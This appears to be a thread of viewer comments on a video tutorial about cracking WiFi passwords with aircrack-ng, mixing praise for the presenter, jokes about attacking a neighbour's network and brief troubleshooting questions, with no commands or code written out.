I will never think in attacking any network bu mine, pinky promess... keep creating awesome content! my (neigh..) own wifi network needs to be cracked!
i have to tell you that you are great..this is the best channel i have ever seen ,and you have a talent in explaination..i would like to thank you,,and i hope some lessons about data recovery..please.
7:42
it is output : wlan0 is on channel 7, but the AP uses channel 4
How can I fix that
Well explained David you did a great job
😎👍
Valuable info! I can test my password conventions against a commonly used wordlist which is most apt to be used against me. Thanks!
ada banyak masalah sebenarnya menggunakan aircrack-ng tapi slama saya ini aircrack sangat efektif dibanding yang lain..itu tergantung anda membuat daftar sandi dan perangkat yang anda pakai..dan terkahir seberapa kuat anda mengoprasikan aircrack..the best tools
You just deserved much more thab "just" over 300k subbers.
Hi David, please on your vmware configuration, did you use NAT or Bridged network to work with the adapter...thanks... I'll appreciate a response
Clear and crisp... Thanks for the video... you nailed it.. :-)
I'm a bit late to this party, but thank you for the clear instructions in this video! In what video did you use a GPU to crack a non-listed password?
respectfully, search it up
Thanks, but what it is the comand to make the size of the terminal bigger? in 2:06
*once again im attacking my own network for demonstration purposes* got me haha